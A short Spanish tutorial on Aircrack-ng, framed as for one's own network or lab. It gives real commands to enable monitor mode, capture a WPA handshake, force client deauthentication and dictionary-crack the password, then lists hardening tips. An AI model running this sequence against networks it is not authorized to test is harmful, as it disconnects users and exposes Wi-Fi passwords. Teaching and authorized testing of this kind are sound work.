Aircrack-ng — Guía paso a paso (uso autorizado)

Aircrack-ng — Guía paso a paso (uso autorizado)
Solo para pruebas en tu red o laboratorio controlado — comandos reales incluidos.
1. Colocar la interfaz en modo monitor
sudo airmon-ng check kill
sudo airmon-ng start wlan0
Esto detiene procesos que interfieren y activa wlan0mon
en modo monitor. Sustituye wlan0
por tu interfaz real.
2. Escanear redes
sudo airodump-ng wlan0mon
Identifica el BSSID y el canal (CH) de tu red.
3. Capturar el handshake
sudo airodump-ng --bssid TU:B8:SSID:XX:XX:XX --channel 6 --write captura wlan0mon
Reemplaza el BSSID y el canal por los de tu red. Guarda en captura.cap
.
Opción: Forzar handshake
sudo aireplay-ng --deauth 5 -a TU:B8:SSID:XX:XX:XX wlan0mon
Desconecta clientes para que se reconecten y capturar el handshake. Úsalo solo en tu red.
4. Analizar y probar contraseñas
sudo aircrack-ng captura.cap -w diccionario.txt
Reemplaza diccionario.txt
por tu archivo de contraseñas. Puedes usar uno personalizado con claves que suelas utilizar.
5. Proteger tu red
- Usa WPA3 o WPA2 con contraseña larga y aleatoria.
- Desactiva WPS.
- Filtra dispositivos por MAC y revisa logs periódicamente.
💡 Recuerda: este procedimiento es únicamente para tu red o laboratorio. Usarlo en redes ajenas es ilegal.